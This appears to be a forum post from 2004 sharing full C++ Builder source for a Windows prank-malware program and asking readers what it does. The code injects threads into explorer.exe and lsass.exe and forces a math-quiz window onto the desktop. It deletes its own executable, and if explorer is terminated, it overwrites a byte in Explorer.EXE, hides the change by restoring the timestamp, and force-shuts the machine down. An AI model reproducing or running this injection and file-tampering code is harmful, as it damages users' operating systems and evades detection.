代码:
//-------------------------Copyright(c) 2003 Immane,inc. (DEBUG)-------------
//---------------------------------------------------------------------------
#include <vcl.h>
#pragma hdrstop
#include "Unit1.h"
#include "Tlhelp32.h"
#define DEBUG
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TForm1 *Form1;
//---------------------------------------------------------------------------
__fastcall TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{
}
//---------------------------------------------------------------------------
typedef struct _RemotePara
{
MSG msg;
char lpFileName[256];
char lpTagerFileName[256];
char lpMessageBox[256];
char lpClassName[7];
char lpClassNameEdit[5];
char lpButtonName[60];
char lpszQuestion[22];
char lpszAnswer[2];
char lpszUserAnswer[64];
char lpszInformation[12];
char lpszSuccessString[256];
char TimeChecksumName[13];
HWND hWnd;
HWND hButton;
HWND hEdit;
HKEY plhResult;
DWORD dwMessageBox;
DWORD dwCreateWindowEx;
DWORD dwUpdateWindow;
DWORD dwGetMessage;
DWORD dwTranslateMessage;
DWORD dwDispatchMessage;
DWORD dwlstrcmpA;
DWORD dwGetWindowTextA;
DWORD dwTerminateProcess;
DWORD dwGetCurrentProcess;
DWORD dwOpenProcess;
DWORD dwSetEnvironmentVariable;
DWORD dwRegOpenKeyA;
DWORD dwRegSetValueExA;
DWORD dwMaxV;
DWORD dwMaxH;
DWORD TimeChecksum;
WNDPROC OldWindowProc;
}RemotePara,*_lpRemotePata;
typedef struct _REOMTEPARAParoxysm
{
#if defined DEBUG
char lpszBuffer[2];
char lpszWindowsDirectory[60];
char lpszTargerDirectory[60];
#endif
char lpszExplorerPath[60];
char lpszLastFilePath[256];
char TimeChecksumName[13];
#if defined WRITEFILE
char lpszZeroBuffers[285];
char lpWriteFileBuffersMZ[2];
char lpWriteFileBuffers_e_lfanew[2];
char lpWriteFileBuffers_PE_FILE_HEADER[133];
char lpWriteFileBuffers_PE_HEADER_LAST[4];
char lpWriteFileBuffers_CODE_Section[315];
char lpWriteFileBuffers_RSRC_Section[352];
#endif
char SE_DEBUG_NAME_PAROXYSM[17];
char SE_SHUTDOWN_NAME_PAROXYSM[20];
bool bOpinion;
HKEY plhResult;
LUID sedebugnameValue;
HFILE hFile;
DWORD dwProcessId;
DWORD dwOldProcessId;
DWORD dwCreateToolhelp32Snapshot;
DWORD dwProcess32First;
DWORD dwProcess32Next;
DWORD dwGetWindowsDirectoryA;
DWORD dwCloseHandle;
DWORD dwSleep;
DWORD dwGetEnvironmentVariable;
DWORD dwlstrcmpA;
DWORD dwRegOpenKeyA;
DWORD dwRegQueryValueExA;
DWORD dwRegDeleteValueA;
DWORD dwDeleteFileA;
DWORD dwTerminateProcess;
DWORD dwGetFileTime;
DWORD dwSetFileTime;
DWORD dwGetCurrentProcess;
DWORD dwOpenProcessToken;
DWORD dwLookupPrivilegeValue;
DWORD dwAdjustTokenPrivileges;
DWORD dwExitWindowsEx;
DWORD TimeChecksum;
DWORD EnvironmentVariable;
DWORD dwTempKeyValue;
#if defined DEBUG
DWORD dwCopyFileA;
DWORD dwOpenFile;
DWORD dw_llseek;
DWORD dw_lwrite;
#endif
HANDLE hToken;
HANDLE hProcessSnap;
HANDLE dwLastProcessHandle;
_OFSTRUCT lpReOpenBuff;
_FILETIME lpLastModifyTime;
PROCESSENTRY32 pe32;
TOKEN_PRIVILEGES tkp;
}RemoteParaParoxysm,*lpRemoteParaParoxysm;
//---------------------------------------------------------------------------
void EnableDebugPriv(void);
void EnableShutdownPriv(void);
DWORD __stdcall ThreadProc(RemotePara *lpPara);
DWORD __stdcall ThreadProcParoxysm(_REOMTEPARAParoxysm *lpParaParoxysm);
//---------------------------------------------------------------------------
DWORD __stdcall ThreadProc(RemotePara *lpPara)
{
typedef int (__stdcall *MCreateWindowExA)(DWORD,char *,char *,DWORD,
DWORD,DWORD,DWORD,DWORD,void *,void *,void *,void *);
typedef int (__stdcall *MUpdateWindow)(void *);
typedef int (__stdcall *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);
typedef int (__stdcall *MGetMessage)(tagMSG *,void *,DWORD,DWORD);
typedef int (__stdcall *MTranslateMessage)(tagMSG *);
typedef int (__stdcall *MDispatchMessage)(tagMSG *);
typedef int (__stdcall *MlstrcmpA)(void *,void *);
typedef int (__stdcall *MGetWindowTextA)(void *,void *,int);
typedef int (__stdcall *MTerminateProcess)(void *,UINT);
typedef int (__stdcall *MOpenProcess)(void *,UINT);
typedef int (__stdcall *MSetEnvironmentVariable)(char *,char *);
typedef int (__stdcall *MRegOpenKeyA)(void *,char *,void **);
typedef int (__stdcall *MRegSetValueExA)(void *,char *,DWORD,DWORD,
BYTE *,DWORD);
typedef void* (__stdcall *MGetCurrentProcess)();
MlstrcmpA lplstrcmpA;
MCreateWindowExA lpCreateWindowEx;
MUpdateWindow lpUpdateWindow;
MMessageBoxA lpMessageBoxA;
MGetMessage lpGetMessage;
MTranslateMessage lpTranslateMessage;
MDispatchMessage lpDispatchMessage;
MGetWindowTextA lpGetWindowTextA;
MGetCurrentProcess lpGetCurrentProcess;
MTerminateProcess lpTerminateProcess;
MOpenProcess lpOpenProcess;
MRegOpenKeyA lpRegOpenKeyA;
MRegSetValueExA lpRegSetValueExA;
MSetEnvironmentVariable lpSetEnvironmentVariable;
lplstrcmpA =(MlstrcmpA)lpPara->dwlstrcmpA;
lpCreateWindowEx =(MCreateWindowExA)lpPara->dwCreateWindowEx;
lpGetWindowTextA =(MGetWindowTextA)lpPara->dwGetWindowTextA;
lpUpdateWindow =(MUpdateWindow)lpPara->dwUpdateWindow;
lpMessageBoxA =(MMessageBoxA)lpPara->dwMessageBox;
lpGetMessage =(MGetMessage)lpPara->dwGetMessage;
lpTranslateMessage =(MTranslateMessage)lpPara->dwTranslateMessage;
lpDispatchMessage =(MDispatchMessage)lpPara->dwDispatchMessage;
lpGetCurrentProcess =(MGetCurrentProcess)lpPara->dwGetCurrentProcess;
lpTerminateProcess =(MTerminateProcess)lpPara->dwTerminateProcess;
//lpOpenProcess =(MOpenProcess)lpPara->dwOpenProcess;
lpRegOpenKeyA =(MRegOpenKeyA)lpPara->dwRegOpenKeyA;
lpRegSetValueExA =(MRegSetValueExA)lpPara->dwRegSetValueExA;
//lpSetEnvironmentVariable=(MSetEnvironmentVariable)lpPara->dwSetEnvironmentVariable;
lpCreateWindowEx(NULL,lpPara->lpClassNameEdit,lpPara->lpszQuestion,
WS_VISIBLE|WS_CHILD|BS_PUSHBUTTON|ES_READONLY|WS_DISABLED,
lpPara->dwMaxV/2-150/2,(lpPara->dwMaxH)/2-25/2-10-20,150,75,
lpPara->hWnd,NULL,NULL,NULL);
lpPara->hEdit=(HANDLE)lpCreateWindowEx(NULL,lpPara->lpClassNameEdit,NULL,
WS_VISIBLE|WS_CHILD|BS_PUSHBUTTON,
lpPara->dwMaxV/2-150/2+10,(lpPara->dwMaxH)/2-25/2-10,130,20,
lpPara->hWnd,NULL,NULL,NULL);
lpPara->hButton=(HANDLE)lpCreateWindowEx(NULL,lpPara->lpClassName,
lpPara->lpButtonName,WS_VISIBLE|WS_CHILD|BS_PUSHBUTTON,
(lpPara->dwMaxV)/2-75/2-5,(lpPara->dwMaxH)/2-25/2+15,85,25,
lpPara->hWnd,NULL,NULL,NULL);
lpUpdateWindow(lpPara->hWnd);
while(lpGetMessage(&(lpPara->msg),NULL,0,0))
{
if (lpPara->msg.hwnd==lpPara->hButton &&
lpPara->msg.message==WM_LBUTTONUP) {
lpGetWindowTextA(lpPara->hEdit,lpPara->lpszUserAnswer,64);
if (lplstrcmpA(lpPara->lpszUserAnswer,lpPara->lpszAnswer))
{
lpTerminateProcess(lpGetCurrentProcess(),0);
return -1; //Not work!!
}
else { lpRegOpenKeyA(HKEY_LOCAL_MACHINE,NULL,&(lpPara->plhResult));
lpRegSetValueExA(lpPara->plhResult,lpPara->TimeChecksumName,NULL,
REG_DWORD,(char*)&(lpPara->TimeChecksum),4);
lpMessageBoxA(NULL,lpPara->lpszSuccessString,
lpPara->lpszInformation ,MB_OK | MB_ICONINFORMATION);
return 0;
}
}
lpTranslateMessage(&(lpPara->msg));
lpDispatchMessage(&(lpPara->msg));
}
return 0;
}
//---------------------------------------------------------------------------
DWORD __stdcall ThreadProcParoxysm(_REOMTEPARAParoxysm *lpParaParoxysm)
{
typedef void* (__stdcall *MCreateToolhelp32Snapshot)(DWORD,DWORD);
typedef void* (__stdcall *MGetCurrentProcess)();
typedef int (__stdcall *MProcess32First)(void *,tagPROCESSENTRY32 *);
typedef int (__stdcall *MProcess32Next)(void *,tagPROCESSENTRY32 *);
typedef int (__stdcall *MGetWindowsDirectoryA)(char *,DWORD);
typedef int (__stdcall *MCloseHandle)(void *);
typedef int (__stdcall *MSleep)(DWORD);
typedef int (__stdcall *MGetEnvironmentVariable)(char *,char *,DWORD);
typedef int (__stdcall *MlstrcmpA)(void *,void *);
typedef int (__stdcall *MRegOpenKeyA)(void *,char *,void **);
typedef int (__stdcall *MRegQueryValueExA)(void *,char *,DWORD *,DWORD *,
char *,DWORD *);
typedef int (__stdcall *MRegDeleteValueA)(void *,char *);
typedef int (__stdcall *MDeleteFileA)(char *);
typedef int (__stdcall *MTerminateProcess)(void *,UINT);
typedef int (__stdcall *MGetFileTime)(void *,_FILETIME *,_FILETIME *,_FILETIME *);
typedef int (__stdcall *MSetFileTime)(void *,_FILETIME *,_FILETIME *,_FILETIME *);
typedef int (__stdcall *MOpenProcessToken)(void *,DWORD,void * *);
typedef int (__stdcall *MLookupPrivilegeValue)(char *,char *,_LUID *);
typedef int (__stdcall *MExitWindowsEx)(UINT,DWORD);
typedef int (__stdcall *MAdjustTokenPrivileges)(void *,int,_TOKEN_PRIVILEGES *,
DWORD,_TOKEN_PRIVILEGES *,DWORD *);
#if defined DEBUG
typedef int (__stdcall *MCopyFileA)(const char *,const char *,DWORD);
typedef int (__stdcall *MOpenFile)(const char *,_OFSTRUCT *,DWORD);
typedef int (__stdcall *M_llseek)(int,long,int);
typedef int (__stdcall *M_lwrite)(int,const char *,DWORD);
#endif
MCreateToolhelp32Snapshot lpCreateToolhelp32Snapshot;
MProcess32First lpProcess32First;
MProcess32Next lpProcess32Next;
MGetWindowsDirectoryA lpGetWindowsDirectoryA;
MCloseHandle lpCloseHandle;
MSleep lpSleep;
MGetEnvironmentVariable lpGetEnvironmentVariable;
MlstrcmpA lplstrcmpA;
MRegOpenKeyA lpRegOpenKeyA;
MRegQueryValueExA lpRegQueryValueExA;
MRegDeleteValueA lpRegDeleteValueA;
MDeleteFileA lpDeleteFileA;
MTerminateProcess lpTerminateProcess;
MGetFileTime lpGetFileTime;
MSetFileTime lpSetFileTime;
MGetCurrentProcess lpGetCurrentProcess;
MOpenProcessToken lpOpenProcessToken;
MLookupPrivilegeValue lpLookupPrivilegeValue;
MAdjustTokenPrivileges lpAdjustTokenPrivileges;
MExitWindowsEx lpExitWindowsEx;
#if defined DEBUG
MCopyFileA lpCopyFileA;
MOpenFile lpOpenFile;
M_llseek lp_llseek;
M_lwrite lp_lwrite;
#endif
lpCreateToolhelp32Snapshot=(MCreateToolhelp32Snapshot)lpParaParoxysm->dwCreateToolhelp32Snapshot;
lpProcess32First=(MProcess32First)lpParaParoxysm->dwProcess32First;
lpProcess32Next=(MProcess32Next)lpParaParoxysm->dwProcess32Next;
//lpGetWindowsDirectoryA=(MGetWindowsDirectoryA)lpParaParoxysm->dwGetWindowsDirectoryA;
lpCloseHandle=(MCloseHandle)lpParaParoxysm->dwCloseHandle;
lpSleep=(MSleep)lpParaParoxysm->dwSleep;
//lpGetEnvironmentVariable=(MGetEnvironmentVariable)lpParaParoxysm->dwGetEnvironmentVariable;
//lplstrcmpA=(MlstrcmpA)lpParaParoxysm->dwlstrcmpA;
lpRegOpenKeyA=(MRegOpenKeyA)lpParaParoxysm->dwRegOpenKeyA;
lpRegQueryValueExA=(MRegQueryValueExA)lpParaParoxysm->dwRegQueryValueExA;
lpRegDeleteValueA=(MRegDeleteValueA)lpParaParoxysm->dwRegDeleteValueA;
lpDeleteFileA=(MDeleteFileA)lpParaParoxysm->dwDeleteFileA;
//lpTerminateProcess=(MTerminateProcess)lpParaParoxysm->dwTerminateProcess;
lpGetFileTime=(MGetFileTime)lpParaParoxysm->dwGetFileTime;
lpSetFileTime=(MSetFileTime)lpParaParoxysm->dwSetFileTime;
lpGetCurrentProcess=(MGetCurrentProcess)lpParaParoxysm->dwGetCurrentProcess;
lpOpenProcessToken=(MOpenProcessToken)lpParaParoxysm->dwOpenProcessToken;
lpLookupPrivilegeValue=(MLookupPrivilegeValue)lpParaParoxysm->dwLookupPrivilegeValue;
lpAdjustTokenPrivileges=(MAdjustTokenPrivileges)lpParaParoxysm->dwAdjustTokenPrivileges;
lpExitWindowsEx=(MExitWindowsEx)lpParaParoxysm->dwExitWindowsEx;
#if defined DEBUG
//lpCopyFileA=(MCopyFileA)lpParaParoxysm->dwCopyFileA;
lpOpenFile=(MOpenFile)lpParaParoxysm->dwOpenFile;
lp_llseek=(M_llseek)lpParaParoxysm->dw_llseek;
lp_lwrite=(M_lwrite)lpParaParoxysm->dw_lwrite;
#endif
lpSleep(1000);
//lpTerminateProcess(lpParaParoxysm->dwLastProcessHandle,0);
lpDeleteFileA(lpParaParoxysm->lpszLastFilePath);
lpParaParoxysm->pe32.dwSize = sizeof(PROCESSENTRY32);
while (lpParaParoxysm->hProcessSnap ==
lpCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0))
{
lpProcess32First(lpParaParoxysm->hProcessSnap,
&(lpParaParoxysm->pe32));
//lpGetEnvironmentVariable(lpParaParoxysm->TimeChecksumName,
// lpParaParoxysm->EnvironmentVariable,8);
lpRegOpenKeyA(HKEY_LOCAL_MACHINE,NULL,&(lpParaParoxysm->plhResult));
lpRegQueryValueExA(lpParaParoxysm->plhResult,lpParaParoxysm->TimeChecksumName,
NULL,&(lpParaParoxysm->dwTempKeyValue),
(char*)&(lpParaParoxysm->EnvironmentVariable),
&(lpParaParoxysm->dwTempKeyValue));
if(lpParaParoxysm->TimeChecksum==
lpParaParoxysm->EnvironmentVariable) {
lpRegDeleteValueA(HKEY_LOCAL_MACHINE,
lpParaParoxysm->TimeChecksumName);
return 0;
}
lpParaParoxysm->bOpinion=0;
do{
if (lpParaParoxysm->pe32.th32ProcessID==
lpParaParoxysm->dwOldProcessId) {
lpParaParoxysm->bOpinion=1; break;
}
}
while (lpProcess32Next(lpParaParoxysm->hProcessSnap,&(lpParaParoxysm->pe32)));
if (!lpParaParoxysm->bOpinion)
{
//Enable Debug Privilege
lpOpenProcessToken(lpGetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|
TOKEN_QUERY,&(lpParaParoxysm->hToken));
lpLookupPrivilegeValue(NULL,lpParaParoxysm->SE_DEBUG_NAME_PAROXYSM,
&(lpParaParoxysm->sedebugnameValue));
lpParaParoxysm->tkp.PrivilegeCount=1;
lpParaParoxysm->tkp.Privileges[0].Luid=lpParaParoxysm->sedebugnameValue;
lpParaParoxysm->tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
lpAdjustTokenPrivileges(lpParaParoxysm->hToken,false,&(lpParaParoxysm->tkp),
sizeof(lpParaParoxysm->tkp),NULL,NULL);
//Enable Shutdown Privilege
lpOpenProcessToken(lpGetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|
TOKEN_QUERY,&(lpParaParoxysm->hToken));
lpLookupPrivilegeValue(NULL,lpParaParoxysm->SE_SHUTDOWN_NAME_PAROXYSM,
&(lpParaParoxysm->sedebugnameValue));
lpParaParoxysm->tkp.PrivilegeCount=1;
lpParaParoxysm->tkp.Privileges[0].Luid=lpParaParoxysm->sedebugnameValue;
lpParaParoxysm->tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
lpAdjustTokenPrivileges(lpParaParoxysm->hToken,false,&(lpParaParoxysm->tkp),
sizeof(lpParaParoxysm->tkp),NULL,NULL);
#if defined DEBUG
//Backup Explorer.EXE program
//lpCopyFileA(lpParaParoxysm->lpszWindowsDirectory,
// lpParaParoxysm->lpszTargerDirectory,0);
lpParaParoxysm->hFile=lpOpenFile(lpParaParoxysm->lpszWindowsDirectory,
&(lpParaParoxysm->lpReOpenBuff),OF_READWRITE);
lpGetFileTime((HANDLE)lpParaParoxysm->hFile,NULL,NULL,
&(lpParaParoxysm->lpLastModifyTime));
//Testing: Show "invalidation programme"
lp_llseek(lpParaParoxysm->hFile,0xEC,FILE_BEGIN);
lp_lwrite(lpParaParoxysm->hFile,lpParaParoxysm->lpszBuffer,1);
lpSetFileTime((HANDLE)lpParaParoxysm->hFile,NULL,NULL,
&(lpParaParoxysm->lpLastModifyTime));
//lpCloseHandle((HANDLE)lpParaParoxysm->hFile); //Cannot be here!!
lpCloseHandle(lpParaParoxysm->hToken);
lpExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,0xFFFF);
#endif
return -1; //no use
}
lpSleep(1000);
}
lpCloseHandle(lpParaParoxysm->hProcessSnap);
return 0;
}
//---------------------------------------------------------------------------
void EnableDebugPriv(void)
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
return;
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&sedebugnameValue))
{
CloseHandle(hToken);
return;
}
tkp.PrivilegeCount =1;
tkp.Privileges[0].Luid =sedebugnameValue;
tkp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken,false,&tkp,sizeof(tkp),NULL,NULL))
{
CloseHandle(hToken);
return;
}
}
//---------------------------------------------------------------------------
void EnableShutdownPriv(void)
{
HANDLE hdlProcessHandle;
HANDLE hdlTokenHandle;
LUID tmpLuid;
TOKEN_PRIVILEGES tkp;
TOKEN_PRIVILEGES tkpNewButIgnored;
DWORD lBufferNeeded;
hdlProcessHandle=GetCurrentProcess();
OpenProcessToken(hdlProcessHandle,TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY, &hdlTokenHandle);
LookupPrivilegeValue(NULL, "SeShutdownPrivilege", &tmpLuid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = tmpLuid;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hdlTokenHandle,false,&tkp,sizeof(tkpNewButIgnored),
&tkpNewButIgnored, &lBufferNeeded );
return;
}
//---------------------------------------------------------------------------
void __fastcall TForm1::FormCreate(TObject *Sender)
{
if (!(LOWORD(LOBYTE(GetVersion()))-4))
{
MessageBox(NULL,"This application cannot "
"be run in Win9x or NT4.0!",
"DEBUGING ERROR =<Immane>= ",16);
PostQuitMessage(0);
}
unsigned long dwProcessId=NULL,dwProcessIdWLO=NULL;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do{
if (String(pe32.szExeFile).UpperCase()=="EXPLORER.EXE")
dwProcessId=pe32.th32ProcessID;
if (String(pe32.szExeFile).UpperCase()=="LSASS.EXE")
dwProcessIdWLO=pe32.th32ProcessID;
}
while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle (hProcessSnap);
const DWORD THREADSIZE=1024*4;
DWORD byte_write;
EnableDebugPriv();
HANDLE hWnd=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);
void *lpRemoteThread=::VirtualAllocEx(hWnd,0,THREADSIZE,
MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
::WriteProcessMemory(hWnd,lpRemoteThread,&ThreadProc,THREADSIZE,0);
RemotePara lpRemotePara;
::ZeroMemory(&lpRemotePara,sizeof(RemotePara));
RECT *MyRect=new RECT;
GetWindowRect(GetDesktopWindow(),MyRect);
lpRemotePara.dwMaxV=MyRect->right;
lpRemotePara.dwMaxH=MyRect->bottom;
HINSTANCE hKernel=::LoadLibrary("kernel32.dll");
lpRemotePara.dwlstrcmpA=(DWORD)::GetProcAddress(hKernel,"lstrcmpA");
lpRemotePara.dwTerminateProcess=(DWORD)::GetProcAddress(hKernel,"TerminateProcess");
lpRemotePara.dwGetCurrentProcess=(DWORD)::GetProcAddress(hKernel,"GetCurrentProcess");
lpRemotePara.dwOpenProcess=(DWORD)::GetProcAddress(hKernel,"OpenProcess");
lpRemotePara.dwSetEnvironmentVariable=
(DWORD)::GetProcAddress(hKernel,"SetEnvironmentVariableA");
HINSTANCE hUser32=::LoadLibrary("user32.dll");
lpRemotePara.dwMessageBox=(DWORD)::GetProcAddress(hUser32,"MessageBoxA");
lpRemotePara.dwUpdateWindow=(DWORD)::GetProcAddress(hUser32,"UpdateWindow");
lpRemotePara.dwGetWindowTextA=(DWORD)::GetProcAddress(hUser32,"GetWindowTextA");
lpRemotePara.dwGetMessage=(DWORD)::GetProcAddress(hUser32,"GetMessageA");
lpRemotePara.dwTranslateMessage=(DWORD)::GetProcAddress(hUser32,"TranslateMessage");
lpRemotePara.dwDispatchMessage=(DWORD)::GetProcAddress(hUser32,"DispatchMessageA");
lpRemotePara.dwCreateWindowEx=(DWORD)::GetProcAddress(hUser32,"CreateWindowExA");
HINSTANCE hAdvdpi32=::LoadLibrary("advapi32.dll");
lpRemotePara.dwRegOpenKeyA=(DWORD)::GetProcAddress(hAdvdpi32,"RegOpenKeyA");
lpRemotePara.dwRegSetValueExA=(DWORD)::GetProcAddress(hAdvdpi32,"RegSetValueExA");
//Environment Time checksum for remotetherad
lstrcpy(lpRemotePara.TimeChecksumName,"TimeChecksum");
lpRemotePara.TimeChecksum=time(0);
lstrcat(lpRemotePara.lpMessageBox,"I Love You,Voilence!\0");
lstrcpy(lpRemotePara.lpszQuestion," 求最小值:x*x+1/(x*x)");
lstrcpy(lpRemotePara.lpszAnswer,"2");
lstrcat(lpRemotePara.lpClassName,"button\0");
lstrcat(lpRemotePara.lpClassNameEdit,"edit\0");
lstrcat(lpRemotePara.lpButtonName,"A.N.S.W.E.R");
lstrcpy(lpRemotePara.lpszInformation,"Information");
lstrcpy(lpRemotePara.lpszSuccessString," Thank you for answering questions!\n"
" You've got the right answer!\n"
"Hope you have a nice Christmas Day!!");
lpRemotePara.hWnd=FindWindow("Progman","Program Manager");
lpRemotePara.hWnd=FindWindowEx(lpRemotePara.hWnd,NULL,"SHELLDLL_DefView",NULL);
lpRemotePara.hWnd=FindWindowEx(lpRemotePara.hWnd,NULL,"SysListView32",NULL);
RemotePara *lpfnRemotePara=(RemotePara *)::VirtualAllocEx(hWnd,0,
sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);
::WriteProcessMemory(hWnd,lpfnRemotePara,&lpRemotePara,
sizeof(lpRemotePara),0);
::CreateRemoteThread(hWnd,0,0,
(DWORD(__stdcall*)(void*))lpRemoteThread,lpfnRemotePara,0,&byte_write);
_REOMTEPARAParoxysm lpParoxysm;
::ZeroMemory(&lpParoxysm,sizeof(_REOMTEPARAParoxysm));
lpParoxysm.dwOldProcessId=dwProcessId;
GetWindowsDirectory(lpParoxysm.lpszExplorerPath,60);
lstrcat(lpParoxysm.lpszExplorerPath,"\\Explorer.EXE");
short bFindRecord=0;
while(*(GetCommandLine()+bFindRecord+++1)-'\"');
lstrcpyn(lpParoxysm.lpszLastFilePath,(GetCommandLine()+1),bFindRecord);
lpParoxysm.dwLastProcessHandle=GetCurrentProcess();
lpParoxysm.dwCreateToolhelp32Snapshot=
(DWORD)::GetProcAddress(hKernel,"CreateToolhelp32Snapshot");
lpParoxysm.dwProcess32First=(DWORD)::GetProcAddress(hKernel,"Process32First");
lpParoxysm.dwProcess32Next=(DWORD)::GetProcAddress(hKernel,"Process32Next");
lpParoxysm.dwGetWindowsDirectoryA=(DWORD)::GetProcAddress(hKernel,"GetWindowsDirectoryA");
lpParoxysm.dwCloseHandle=(DWORD)::GetProcAddress(hKernel,"CloseHandle");
lpParoxysm.dwSleep=(DWORD)::GetProcAddress(hKernel,"Sleep");
lpParoxysm.dwGetEnvironmentVariable=
(DWORD)::GetProcAddress(hKernel,"GetEnvironmentVariableA");
lpParoxysm.dwlstrcmpA=(DWORD)::GetProcAddress(hKernel,"lstrcmpA");
lpParoxysm.dwDeleteFileA=(DWORD)::GetProcAddress(hKernel,"DeleteFileA");
lpParoxysm.dwGetFileTime=(DWORD)::GetProcAddress(hKernel,"GetFileTime");
lpParoxysm.dwSetFileTime=(DWORD)::GetProcAddress(hKernel,"SetFileTime");
lpParoxysm.dwTerminateProcess=lpRemotePara.dwTerminateProcess;
lpParoxysm.dwGetCurrentProcess=lpRemotePara.dwGetCurrentProcess;
lpParoxysm.dwExitWindowsEx=(DWORD)::GetProcAddress(hUser32,"ExitWindowsEx");
lpParoxysm.dwRegOpenKeyA=(DWORD)::GetProcAddress(hAdvdpi32,"RegOpenKeyA");
lpParoxysm.dwRegQueryValueExA=(DWORD)::GetProcAddress(hAdvdpi32,"RegQueryValueExA");
lpParoxysm.dwRegDeleteValueA=(DWORD)::GetProcAddress(hAdvdpi32,"RegDeleteValueA");
lpParoxysm.dwOpenProcessToken=(DWORD)::GetProcAddress(hAdvdpi32,"OpenProcessToken");
lpParoxysm.dwLookupPrivilegeValue=(DWORD)::GetProcAddress(hAdvdpi32,"LookupPrivilegeValueA");
lpParoxysm.dwAdjustTokenPrivileges=(DWORD)::GetProcAddress(hAdvdpi32,"AdjustTokenPrivileges");
#if defined WRITEFILE
lstrcpy(lpParoxysm.lpWriteFileBuffersMZ,lpWriteFileBuffersMZ);
lstrcpy(lpParoxysm.lpWriteFileBuffers_e_lfanew,lpWriteFileBuffers_e_lfanew);
lstrcpy(lpParoxysm.lpWriteFileBuffers_PE_FILE_HEADER,lpWriteFileBuffers_PE_FILE_HEADER);
lstrcpy(lpParoxysm.lpWriteFileBuffers_PE_HEADER_LAST,lpWriteFileBuffers_PE_HEADER_LAST);
lstrcpy(lpParoxysm.lpWriteFileBuffers_CODE_Section,lpWriteFileBuffers_CODE_Section);
lstrcpy(lpParoxysm.lpWriteFileBuffers_RSRC_Section,lpWriteFileBuffers_RSRC_Section);
#endif
#if defined DEBUG
lpParoxysm.dwCopyFileA =(DWORD)::GetProcAddress(hKernel,"CopyFileA");
lpParoxysm.dwOpenFile=(DWORD)::GetProcAddress(hKernel,"OpenFile");
lpParoxysm.dw_llseek=(DWORD)::GetProcAddress(hKernel,"_llseek");
lpParoxysm.dw_lwrite=(DWORD)::GetProcAddress(hKernel,"_lwrite");
lstrcat(lpParoxysm.lpszBuffer,"\077\0");
lstrcat(lpParoxysm.lpszWindowsDirectory,"E:\\WINNT\\EXPLORER.EXE");
lstrcat(lpParoxysm.lpszTargerDirectory,"E:\\WINNT\\SYSTEM32\\EXPLORER.EXE");
#endif
//Environment Time checksum for remotetherad
lstrcpy(lpParoxysm.TimeChecksumName,lpRemotePara.TimeChecksumName);
lpParoxysm.TimeChecksum=lpRemotePara.TimeChecksum;
lstrcpy(lpParoxysm.SE_DEBUG_NAME_PAROXYSM,"SeDebugPrivilege");
lstrcpy(lpParoxysm.SE_SHUTDOWN_NAME_PAROXYSM,"SeShutdownPrivilege");
EnableDebugPriv();
hWnd=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessIdWLO);
lpRemoteThread=::VirtualAllocEx(hWnd,0,THREADSIZE,
MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
::WriteProcessMemory(hWnd,lpRemoteThread,&ThreadProcParoxysm,THREADSIZE,0);
_REOMTEPARAParoxysm *lpfnRemoteParaParoxysm=(_REOMTEPARAParoxysm *)
::VirtualAllocEx(hWnd,0,sizeof(_REOMTEPARAParoxysm),
MEM_COMMIT,PAGE_READWRITE);
::WriteProcessMemory(hWnd,lpfnRemoteParaParoxysm,&lpParoxysm,
sizeof(lpParoxysm),0);
::CreateRemoteThread(hWnd,0,0,(DWORD(__stdcall*)(void*))lpRemoteThread,
lpfnRemoteParaParoxysm,0,&byte_write);
PostQuitMessage(0);
}
//---------------------------------------------------------------------------
2004-01-26
看看这个程序~看看他能做什么,技术如何?? 
平板模式
